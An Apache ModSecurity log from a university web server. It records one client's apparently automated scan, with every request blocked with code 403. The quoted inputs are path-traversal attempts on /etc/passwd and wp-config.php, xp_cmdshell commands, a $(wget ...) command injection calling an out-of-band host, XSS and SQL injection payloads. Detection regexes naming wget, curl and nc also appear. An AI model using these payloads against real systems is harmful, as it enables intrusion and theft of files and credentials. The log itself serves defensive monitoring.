[Tue Aug 29 11:45:23.360397 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAfiYusAAAAg"]
[Tue Aug 29 11:45:23.384031 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhvjWsAAAAs"]
[Tue Aug 29 11:45:23.394704 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAg-pPEAAAAR"]
[Tue Aug 29 11:45:24.368175 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAg-pPIAAAAR"]
[Tue Aug 29 11:45:24.390127 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAh5RXUAAAA3"]
[Tue Aug 29 11:45:25.356798 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhhcxYAAAAd"]
[Tue Aug 29 11:45:25.371967 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAh7wuIAAAA5"]
[Tue Aug 29 11:45:25.390783 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAh4DZEAAAA2"]
[Tue Aug 29 11:45:26.400144 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhpwQ4AAAAm"]
[Tue Aug 29 11:45:27.352686 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAh7wucAAAA5"]
[Tue Aug 29 11:45:28.394116 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhrqIoAAAAo"]
[Tue Aug 29 11:45:29.406351 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAh3f8IAAAA1"]
[Tue Aug 29 11:45:30.373444 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAhtjd4AAAAq"]
[Tue Aug 29 11:45:31.355689 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhlz5kAAAAi"]
[Tue Aug 29 11:45:35.459301 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhBSBwAAAAX"]
[Tue Aug 29 11:45:36.611926 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAhgoJAAAAAb"]
[Tue Aug 29 11:45:43.860398 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26griiyq9je8zo9d.oast.site found within TX:1: cjmnbitjmimt14dgn26griiyq9je8zo9d.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhT30cAAAAD"]
[Tue Aug 29 11:45:47.600073 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1gAAAAr"]
[Tue Aug 29 11:45:48.640059 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhBSC8AAAAX"]
[Tue Aug 29 11:45:48.947595 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhlz8AAAAAi"]
[Tue Aug 29 11:45:49.387867 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAhlz8QAAAAi"]
[Tue Aug 29 11:45:51.366022 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAi2x@8AAAAN"]
[Tue Aug 29 11:45:56.359718 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAfiYzYAAAAg"]
[Tue Aug 29 11:46:00.227636 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "112.215.171.207_35468770ed4f68abe5004e7b75f46e689736368e"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14B8Co-f0AAAhrqNEAAAAo"]
[Tue Aug 29 11:46:00.282137 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "194.163.187.74_3f5a35ef46791bf2b045be8a76ecf73d8b0bed0c"): Internal error [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14B8Co-f0AAAhtjhgAAAAq"]
[Tue Aug 29 11:46:01.374770 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAhrqNUAAAAo"]
[Tue Aug 29 11:46:01.425667 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhZRisAAAAG"]
[Tue Aug 29 11:46:02.409103 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAfbk00AAAAZ"]
[Tue Aug 29 11:46:02.411424 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAib5wgAAAAA"]
[Tue Aug 29 11:46:07.365694 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26g9fwmdhe8os4gg.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAi0JI0AAAAK"]
[Tue Aug 29 11:46:08.390893 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhlz-EAAAAi"]
[Tue Aug 29 11:46:09.494899 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5YAAAAF"]
[Tue Aug 29 11:46:09.534861 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-sAAAAi"]
[Tue Aug 29 11:46:12.540230 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAhrqPQAAAAo"]
[Tue Aug 29 11:46:12.559942 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAhrqPUAAAAo"]
[Tue Aug 29 11:46:13.433680 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhtjjwAAAAq"]
[Tue Aug 29 11:46:13.456108 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAib50UAAAAA"]
